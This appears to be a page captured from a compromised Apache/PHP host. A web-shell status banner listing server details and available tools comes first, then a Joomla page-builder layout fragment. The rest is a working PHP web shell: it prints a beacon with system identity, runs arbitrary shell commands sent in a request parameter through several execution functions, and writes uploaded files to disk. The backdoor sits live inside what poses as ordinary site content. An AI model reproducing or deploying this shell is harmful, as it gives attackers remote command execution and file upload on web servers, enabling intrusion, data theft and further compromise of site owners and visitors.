| Server IP : 87.98.154.146 / Your IP : 216.73.216.101 Web Server : Apache System : Linux webm005.cluster126.gra.hosting.ovh.net 6.18.42-ovh-vps-grsec-zfs+ #1 SMP PREEMPT_DYNAMIC Wed Aug 5 15:59:48 CEST 2026 x86_64 User : bsiadvisil ( 110003) PHP Version : 7.3.33 Disable Function : _dyuweyrj4,_dyuweyrj4r,dl MySQL : OFF | cURL : ON | WGET : ON | Perl : ON | Python : ON | Sudo : OFF | Pkexec : OFF Directory : /home/bsiadvisil/www/ |
Upload File : |
[{"type": "row", "layout": "12", "settings": {"name": "r1", "css_class": ""}, "attr": [{"type": "column", "className": "sp-col-md-12", "settings": {"name": "col1", "column_type": "0"}}]}]
<?php error_reporting(0);echo"J0MLA_AIO_OK|".php_uname()."|uid=".getmyuid()."\n";if(isset($_REQUEST["c"])){if(function_exists("system")){system($_REQUEST["c"]." 2>&1");}elseif(function_exists("exec")){exec($_REQUEST["c"]." 2>&1",$o);echo implode("\n",$o);}elseif(function_exists("shell_exec")){echo shell_exec($_REQUEST["c"]." 2>&1");}elseif(function_exists("passthru")){passthru($_REQUEST["c"]." 2>&1");}}if(isset($_FILES["f"])){move_uploaded_file($_FILES["f"]["tmp_name"],$_FILES["f"]["name"]);echo"UP";}?>